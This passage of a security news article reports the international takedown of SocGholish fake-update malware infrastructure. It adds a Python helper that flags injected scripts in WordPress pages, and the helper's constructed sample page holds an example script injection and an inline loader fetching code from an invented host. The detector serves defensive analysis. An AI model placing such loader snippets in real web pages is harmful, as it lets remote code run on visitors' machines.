Dutch law enforcement authorities, along with counterparts from Canada, Germany, and the U.S., have disrupted malicious infrastructure associated with SocGholish and cleaned up nearly 15,000 infected WordPress websites.
“With these actions we deprive cybercriminals of access to infected computer systems,” Maikel Rollman of the Netherlands National High Tech Crime Unit said.
“This prevents further damage to the digital systems of citizens, businesses and organizations worldwide and limits the spread of malware. It also reduces the risk that these systems are used for cyber attacks on critical infrastructure and other essential societal processes. This marks the beginning of further action against SocGholish.”
The takedown is part of Operation Endgame, an ongoing international law enforcement initiative to combat botnets and associated criminal infrastructures. It was launched in 2024.
As part of the effort, 106 servers linked to SocGholish have been taken down and 14,971 WordPress sites have been rid of the infections. Website owners have been notified to update their content management system (CMS), change their credentials, and delete any suspicious accounts.
Active since 2017 and also known as FakeUpdates, SocGholish is a JavaScript (JS)-based downloader malware that typically serves as a conduit for next-stage malware tied to various threat actors and malware families, including Evil Corp (aka DEV-0243, Indrik Spider, and UNC2165), LockBit, RansomHub, Dridex, and Raspberry Robin (aka Roshtyak).
It is distributed via compromised websites that display fake update prompts for web browsers like Google Chrome or Mozilla Firefox and for other popular software. The operators of the malware have been tracked under various aliases, such as Gold Prelude, Mustard Tempest, Purple Vallhund, TA569 and UNC1543.
“SocGholish infections typically originate from compromised websites that have been infected in multiple different ways,” Silent Push noted in an analysis of the malware last year. “Website infections can involve direct injections, where the SocGholish payload delivery injects JS directly loaded from an infected webpage or via a version of the direct injection that uses an intermediate JS file to load the related injection.”
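The two injection shapes Silent Push describes, a script tag pointing straight at an attacker-controlled host and an inline snippet that builds a second script element at runtime, are both visible in a saved copy of an infected page. The following triage helper is an added example written for this article; it is not code from the article, from Silent Push, or from any named vendor. It parses a page's script elements and flags (a) external script sources whose host is not on a per-site allowlist and (b) inline scripts that look like loaders. The allowlist hosts, the fake-cdn hostname and the sample page are constructed for the example, and the inline patterns are heuristics rather than SocGholish signatures.

```python
"""Triage helper: find injected <script> elements in a saved HTML page.

Added example, not part of the original article. Hostnames and the sample
page below are constructed; the loader patterns are generic heuristics.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads JavaScript from (constructed for the
# example; in practice derive it from the theme and plugins you actually run).
ALLOWED_SCRIPT_HOSTS = {"example-site.test", "cdn.example-site.test"}

# Inline-script shapes worth a second look: manufacturing another <script>
# element (an intermediate loader) or decoding/evaluating code at runtime.
LOADER_PATTERNS = [
    re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I),
    re.compile(r"document\.write\s*\(", re.I),
    re.compile(r"\beval\s*\(|\batob\s*\(|fromCharCode", re.I),
]
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)


class _ScriptCollector(HTMLParser):
    """Collect every <script> element as (src attribute, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None  # None while not inside a <script>

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._src, self._buf = None, None


def _host(url):
    return (urlparse(url).hostname or "").lower()


def scan_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return findings for scripts that do not belong on the page."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, body in parser.scripts:
        if src:
            # A relative src is same-origin and not suspicious by itself.
            if src.startswith(("http://", "https://", "//")):
                host = _host(src if "://" in src else "https:" + src)
                if host not in allowed_hosts:
                    findings.append({"kind": "external_script", "host": host, "src": src})
            continue
        if not any(p.search(body) for p in LOADER_PATTERNS):
            continue
        # Off-allowlist hosts referenced by the loader body are the lead to chase.
        off_site = sorted({_host(u) for u in URL_RE.findall(body)} - set(allowed_hosts))
        findings.append({"kind": "inline_loader", "hosts": off_site, "snippet": body[:80]})
    return findings


# Constructed sample: two legitimate scripts, one harmless inline snippet,
# one direct injection and one intermediate loader (hostnames are invented).
SAMPLE_PAGE = """<!doctype html>
<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.example-site.test/theme.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://updates.fake-cdn.test/report.js"></script>
<script>var s=document.createElement('script');s.src='https://updates.fake-cdn.test/loader.js';document.head.appendChild(s);</script>
</head><body><p>Hello</p></body></html>
"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(finding)
```

Run it over pages fetched with a browser-like User-Agent and from an IP outside your own network: injection code of this kind is commonly served conditionally, so a fetch from the site owner's own machine may see a clean page. Treat the inline patterns as a prompt for manual review, not as proof of compromise.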
In November 2025, Arctic Wolf revealed that SocGholish was being used by the RomCom threat actors to deliver the Mythic Agent, highlighting the use of the initial access broker’s services by a broad range of actors with varied motivations.
[Figure: IP-geolocated SocGholish compromised WordPress sites per country]
Orange Cyberdefense said it has observed SocGholish infections delivering loaders like Gholoader (another JavaScript-based loader) and MintsLoader, which, in turn, lead to the deployment of additional payloads like GhostWeaver, LockBit, AsyncRAT, and NetSupport RAT.
“SocGholish uses a layered delivery model and has been observed enabling multiple categories of follow-on payloads,” the cybersecurity company said, adding the threat actor also…